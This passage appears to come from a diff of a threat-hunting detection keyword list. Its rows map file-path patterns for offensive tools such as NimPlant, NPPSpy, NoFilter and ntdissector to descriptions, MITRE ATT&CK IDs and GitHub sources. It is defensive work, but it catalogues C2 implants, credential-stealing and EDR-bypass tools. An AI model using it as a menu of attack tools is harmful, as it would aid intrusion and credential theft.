+"*/NimExec.git*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z"
+"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*/ninja.crt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/Ninja.git*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/ninja.key*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/nipe.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z"
+"*/nipe.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data 
Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z"
+"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*/nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/nmap-nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*/nmap-scada*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - 
TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*/nmap-vulners*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*/nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*/NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
+"*/NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.git*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/nopac.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*/nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/noseyparker.git*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*/NotQuite0DayFriday/zip/trunk*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/nowsecure/dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*/nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nps_payload.git*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*/nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nse_install/*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/nse-install.git*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*/NTDLLReflection.git*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*/NtdllUnpatcher.git*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*/NTLMRecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*/NTLMRecon.git*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/ntlmrecon/*.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix 
LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*/ntlmrelayx/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/ntlmrelayx/*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/ntlmscan.git*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - 
T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*/ntlmscan/*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - 
